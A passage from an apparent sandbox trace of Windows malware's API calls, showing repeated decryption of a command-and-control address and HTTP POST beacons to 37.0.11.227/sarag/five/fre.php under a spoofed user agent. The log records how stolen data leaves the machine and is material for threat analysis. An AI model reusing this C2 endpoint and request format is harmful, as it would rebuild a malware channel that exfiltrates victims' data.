0x6b2fb8 [0251.832] recv (in: s=0x70c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.916] GetProcessHeap () returned 0x690000 [0251.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0251.916] GetProcessHeap () returned 0x690000 [0251.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.917] GetProcessHeap () returned 0x690000 [0251.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0251.917] GetProcessHeap () returned 0x690000 [0251.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0251.918] closesocket (s=0x70c) returned 0 [0251.919] GetProcessHeap () returned 0x690000 [0251.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0251.919] GetProcessHeap () returned 0x690000 [0251.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0251.919] GetProcessHeap () returned 0x690000 [0251.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0251.919] GetProcessHeap () returned 0x690000 [0251.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0251.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1474) returned 0x70c [0251.922] Sleep (dwMilliseconds=0xea60) [0251.923] GetProcessHeap () returned 0x690000 [0251.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0251.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.924] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.930] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0251.940] GetProcessHeap () returned 0x690000 [0251.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0251.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.941] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0251.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.942] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.944] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.944] GetProcessHeap () returned 0x690000 [0251.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0251.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.948] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0251.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.949] CryptDestroyKey (hKey=0x69d628) returned 1 [0251.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.950] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0251.950] GetProcessHeap () returned 0x690000 [0251.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.951] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.952] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.953] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.954] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.954] GetProcessHeap () returned 0x690000 [0251.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.954] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.961] GetProcessHeap () returned 0x690000 [0251.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.962] GetProcessHeap () returned 0x690000 [0251.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.962] GetProcessHeap () returned 0x690000 [0251.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0251.963] GetProcessHeap () returned 0x690000 [0251.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0251.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.965] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.970] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0251.977] GetProcessHeap () returned 0x690000 [0251.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0251.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.978] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.982] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.983] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.983] GetProcessHeap () returned 0x690000 [0251.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0251.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.985] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0251.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.986] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.988] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0251.988] GetProcessHeap () returned 0x690000 [0251.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.991] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.992] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.993] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.994] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.994] GetProcessHeap () returned 0x690000 [0251.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.995] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.995] GetProcessHeap () returned 0x690000 [0251.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0251.995] socket (af=2, type=1, protocol=6) returned 0x710 [0251.995] connect (s=0x710, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0252.019] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0252.019] GetProcessHeap () returned 0x690000 [0252.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0252.019] GetProcessHeap () returned 0x690000 [0252.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0252.020] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.021] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.021] GetProcessHeap () returned 0x690000 [0252.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0252.022] GetProcessHeap () returned 0x690000 [0252.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.022] GetProcessHeap () returned 0x690000 [0252.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0252.024] GetProcessHeap () returned 0x690000 [0252.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0252.025] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.025] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.025] GetProcessHeap () returned 0x690000 [0252.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0252.026] GetProcessHeap () returned 0x690000 [0252.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.026] send (s=0x710, buf=0x6ad508*, len=242, flags=0) returned 242 [0252.027] send (s=0x710, buf=0x6aba40*, len=159, flags=0) returned 159 [0252.027] GetProcessHeap () returned 0x690000 [0252.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0252.027] recv (in: s=0x710, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0252.106] GetProcessHeap () returned 0x690000 [0252.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0252.107] GetProcessHeap () returned 0x690000 [0252.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0252.108] GetProcessHeap () returned 0x690000 [0252.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0252.110] GetProcessHeap () returned 0x690000 [0252.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0252.110] closesocket (s=0x710) returned 0 [0252.110] GetProcessHeap () returned 0x690000 [0252.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0252.110] GetProcessHeap () returned 0x690000 [0252.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.113] GetProcessHeap () returned 0x690000 [0252.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0252.113] GetProcessHeap () returned 0x690000 [0252.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0252.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1478) returned 0x710 [0252.115] Sleep (dwMilliseconds=0xea60) [0252.117] GetProcessHeap () returned 0x690000 [0252.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0252.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0252.129] GetProcessHeap () returned 0x690000 [0252.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0252.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.130] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.131] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.132] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.132] GetProcessHeap () returned 0x690000 [0252.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0252.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.135] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0252.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.136] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.137] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0252.138] GetProcessHeap () returned 0x690000 [0252.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.138] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.139] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.140] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.146] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.146] GetProcessHeap () returned 0x690000 [0252.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0252.146] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.146] GetProcessHeap () returned 0x690000 [0252.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0252.147] GetProcessHeap () returned 0x690000 [0252.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.147] GetProcessHeap () returned 0x690000 [0252.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0252.148] GetProcessHeap () returned 0x690000 [0252.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0252.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.149] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.154] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0252.161] GetProcessHeap () returned 0x690000 [0252.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0252.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.162] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0252.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.163] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.164] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.164] GetProcessHeap () returned 0x690000 [0252.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0252.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.166] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0252.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.167] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0252.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.168] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0252.168] GetProcessHeap () returned 0x690000 [0252.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.169] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0252.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.170] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0252.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.171] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0252.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.172] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0252.172] GetProcessHeap () returned 0x690000 [0252.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0252.173] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0252.173] GetProcessHeap () returned 0x690000 [0252.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0252.173] socket (af=2, type=1, protocol=6) returned 0x714 [0252.173] connect (s=0x714, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0252.197] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0252.197] GetProcessHeap () returned 0x690000 [0252.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0252.197] GetProcessHeap () returned 0x690000 [0252.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0252.198] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.199] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.199] GetProcessHeap () returned 0x690000 [0252.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0252.199] GetProcessHeap () returned 0x690000 [0252.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.199] GetProcessHeap () returned 0x690000 [0252.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0252.199] GetProcessHeap () returned 0x690000 [0252.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0252.200] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.201] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.201] GetProcessHeap () returned 0x690000 [0252.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0252.201] GetProcessHeap () returned 0x690000 [0252.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.201] send (s=0x714, buf=0x6ad508*, len=242, flags=0) returned 242 [0252.203] send (s=0x714, buf=0x6aba40*, len=159, flags=0) returned 159 [0252.203] GetProcessHeap () returned 0x690000 [0252.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0252.203] recv (in: s=0x714, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0252.269] GetProcessHeap () returned 0x690000 [0252.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0252.270] GetProcessHeap () returned 0x690000 [0252.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0252.272] GetProcessHeap () returned 0x690000 [0252.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0252.273] GetProcessHeap () returned 0x690000 [0252.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0252.273] closesocket (s=0x714) returned 0 [0252.274] GetProcessHeap () returned 0x690000 [0252.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0252.274] GetProcessHeap () returned 0x690000 [0252.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.275] GetProcessHeap () returned 0x690000 [0252.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0252.275] GetProcessHeap () returned 0x690000 [0252.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | 